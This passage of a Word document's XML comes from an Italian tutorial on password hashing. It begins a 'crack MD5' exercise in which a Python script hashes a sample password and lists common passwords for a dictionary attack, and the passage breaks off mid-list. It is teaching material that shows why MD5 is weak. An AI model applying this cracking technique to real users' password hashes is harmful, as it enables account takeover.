          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">al massimo 4 hash/secondo per processo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, contro i 164 miliardi/secondo di MD5. Un fattore di 40 miliardi.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="339"/>
    <w:bookmarkStart w:id="340" w:name="X88aef37981cbc62076a39801290c70d8c3ef84e"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 6 — Esperimento: cracckare le password vecchie con MD5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Per capire perché MD5 è morto, fai questo esperimento. Crea</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">crack-md5.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> hashlib</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Hash MD5 di "mario123" (la vecchia password di Mario)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">hash_target </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> hashlib.md5(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b"mario123"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">).hexdigest()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">f"Hash target: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">hash_target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Wordlist (dizionario) — usiamo le 50 password più comuni</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">wordlist </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"123456"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"password"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"12345678"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"qwerty"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"123456789"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"12345"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"1234"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"111111"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"1234567"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"dragon"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"123123"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"baseball"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"abc123"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"football"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"monkey"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"letmein"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"shadow"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"master"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"666666"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"qwertyuiop"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"123321"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"mustang"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"1234567890"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"michael"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"654321"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"superman"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"1qaz2wsx"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"7777777"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"121212"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"000000"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"qazwsx"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"123qwe"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"killer"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"trustno1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"jordan"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"jennifer"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"zxcvbnm"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"asdfgh"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"hunter"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"buster"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"soccer"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"harley"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"batman"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"andrew"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"tigger"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"sunshine"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"iloveyou"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"2000"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"charlie"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"robert"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"thomas"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"hockey"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"ranger"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"daniel"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"starwars"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"klaster"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"112233"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"george"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"asshole"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"computer"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"michelle"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"jessica"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"pepper"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"1111"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"zxcvbn"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"555555"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"11111111"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"131313"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"freedom"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"777777"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"pass"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"fuck"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"maggie"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"159753"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"aaaaaa"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
